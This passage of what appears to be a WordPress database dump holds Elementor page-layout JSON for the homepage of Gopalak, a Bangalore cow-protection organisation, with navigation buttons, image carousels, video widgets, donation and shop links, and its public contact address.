"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\",\"title_color\":\"#43693F\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba24d1d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"},\"background_slideshow_gallery\":[{\"id\":1577,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\"},{\"id\":1544,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/gopalak-B1-copy.jpg\"}],\"padding\":{\"unit\":\"px\",\"top\":\"150\",\"right\":\"0\",\"bottom\":\"0150\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5007eb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c7f7d6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"-10\",\"left\":\"-10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(11350,1888,'_elementor_page_assets','a:0:{}'),(11353,1889,'_elementor_edit_mode','builder'),(11354,1889,'_elementor_template_type','wp-page'),(11355,1889,'_elementor_version','3.7.8'),(11356,1889,'_wp_page_template','elementor_canvas'),(11357,1889,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#D5EBC1\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#111111\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#D5EBC1\",\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#D5EBC1\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#D5EBC1\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#D5EBC1\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-3\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1741,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-min-an-1455455-scaled.jpg\"},{\"id\":1742,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-roman-odintsov-8747798-scaled.jpg\"},{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"autoplay_speed\":1000,\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"You can donate any amount of your choice which will be used for fodder to feed cows.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D5EBC1\",\"css_filters_css_filter\":\"custom\",\"title_color\":\"#43693F\",\"title_typography_typography\":\"custom\",\"title_typography_font_family\":\"Itim\",\"title_typography_font_weight\":\"600\",\"description_color\":\"#43693F\",\"description_typography_typography\":\"custom\",\"description_typography_font_family\":\"Itim\",\"description_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Shop With Us\",\"description_text\":\"\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D5EBC1\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"},\"title_color\":\"#43693F\",\"title_typography_typography\":\"custom\",\"title_typography_font_family\":\"Itim\",\"title_typography_font_weight\":\"600\",\"description_color\":\"#43693F\",\"description_typography_typography\":\"custom\",\"description_typography_font_family\":\"Itim\",\"description_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\",\"title_color\":\"#43693F\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba24d1d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"},\"background_slideshow_gallery\":[{\"id\":1577,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\"},{\"id\":1544,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/gopalak-B1-copy.jpg\"}],\"padding\":{\"unit\":\"px\",\"top\":\"150\",\"right\":\"0\",\"bottom\":\"0150\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5007eb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c7f7d6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"-10\",\"left\":\"-10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(11358,1889,'_elementor_page_assets','a:0:{}'),(11360,1890,'_elementor_edit_mode','builder'),(11361,1890,'_elementor_template_type','wp-page'),(11362,1890,'_elementor_version','3.7.8'),(11363,1890,'_wp_page_template','elementor_canvas'),(11364,1890,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#D5EBC1\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#111111\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#D5EBC1\",\"button_text_colo